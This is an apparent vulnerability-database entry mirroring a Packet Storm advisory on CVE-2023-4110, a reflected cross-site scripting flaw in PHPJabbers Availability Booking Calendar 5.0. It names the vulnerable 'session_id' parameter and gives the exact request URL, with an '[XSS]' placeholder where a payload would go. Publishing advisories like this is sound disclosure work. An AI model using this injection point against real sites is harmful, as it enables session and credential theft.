Lucene search
CraCkErPACKETSTORM:173926HistoryAug 03, 2023 - 12:00 a.m.
PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting
2023-08-0300:00:00
CraCkEr
packetstormsecurity.com
152
cross site scripting
phpjabbers
reflected xss
email
instant message
session token
login credentials
vulnerable
rxss
website
controller
pjfront
action
pjactiongetbookingform
session id
cid
view
month
year
start date
end date
locale
EPSS
0.006
Percentile
78.5%
`# Exploit Title: PHPJabbers Availability Booking Calendar 5.0 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 20/07/2023
# Vendor: PHPJabbers
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/availability-booking-calendar/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4110
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /index.php
GET parameter 'session_id' is vulnerable to RXSS
https://website/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=[XSS]&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0
[-] Done
`
Related
cvelist
cvelist
nvd
nvd
CVE-2023-4110
2023-08-03 03:15:10
cve
cve
CVE-2023-4110
2023-08-03 03:15:10
prion
prion
Cross site scripting
2023-08-03 03:15:00
nuclei
nuclei
PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting
2023-10-17 07:20:28